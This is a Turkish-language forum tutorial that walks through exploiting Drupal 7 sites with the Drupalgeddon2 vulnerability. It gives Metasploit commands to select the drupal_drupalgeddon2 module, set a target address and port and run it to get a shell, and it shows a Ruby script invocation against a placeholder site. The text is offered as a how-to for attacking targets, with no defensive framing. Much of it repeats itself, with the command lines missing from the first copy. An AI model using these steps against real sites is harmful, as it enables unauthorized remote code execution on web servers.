Merhabalar Bu Günkü Toolumuz Drupalgeddon2 .Ruby ile Birlikte Kullanmamız Gerekmekte ve ****sploit e de sahip olmamız gerekmektedir.
Aynı Zamanda Msf içinden de exploite ulaşabilirsiniz.
Drupal Nedir?
Drupal bir içerik yönetim sistemi yani Sayfanızı yönetmenizi sağlayan web programdır.
****sploit Üzerinden Kullanımı
Exploit ;
ve ya
Her Zamanki ****sploit . Use , Set , Target ve Rport A ihtiyaç var. ( Port Açmanıza gerek yoktur.)
Üstteki komutlar nedir derseniz hemen anlatıyorum.
use : Kullanmak İstediğiniz Exploit dizinine gider.
Set : Değişkenleri değiştirmek İçin Kullandığımız komuttur.
Target : Hedef adresi göstereceğimiz komuttur.
RPORT: Hedef Port Numarasını Göstereceğimiz komuttur.
Şimdi Exploiti Use Komutu ile Seçelim.
Daha Sonra
Şimdi son adıma geldik. En Azından ****sploit için.
Şimdi Shell Adımındayız.
Adımların Uygulanmış Hali Aşağıdaki Gibidir:
Drupalgeddon2 Github Kullanımı
Aslında burası bir tek adımdan oluşmakta.
Aynı Zamanda Msf içinden de exploite ulaşabilirsiniz.
Drupal Nedir?
Drupal bir içerik yönetim sistemi yani Sayfanızı yönetmenizi sağlayan web programdır.
****sploit Üzerinden Kullanımı
Exploit ;
Kod:
search drupal
ve ya
Kod:
searchsploit drupal 7
Her Zamanki ****sploit . Use , Set , Target ve Rport A ihtiyaç var. ( Port Açmanıza gerek yoktur.)
Üstteki komutlar nedir derseniz hemen anlatıyorum.
use : Kullanmak İstediğiniz Exploit dizinine gider.
Set : Değişkenleri değiştirmek İçin Kullandığımız komuttur.
Target : Hedef adresi göstereceğimiz komuttur.
RPORT: Hedef Port Numarasını Göstereceğimiz komuttur.
Şimdi Exploiti Use Komutu ile Seçelim.
Kod:
use unix/webapp/drupal_drupalgeddon2
Daha Sonra
Kod:
set target 10.x.x.x
Şimdi son adıma geldik. En Azından ****sploit için.
Kod:
set RPORT 1898
Şimdi Shell Adımındayız.
Kod:
" exploit " ve ya " run "
Adımların Uygulanmış Hali Aşağıdaki Gibidir:
Drupalgeddon2 Github Kullanımı
Aslında burası bir tek adımdan oluşmakta.
Kod:
ruby drupalgeddon2.rb https://hedefsite.com/drupal7
Son düzenleme: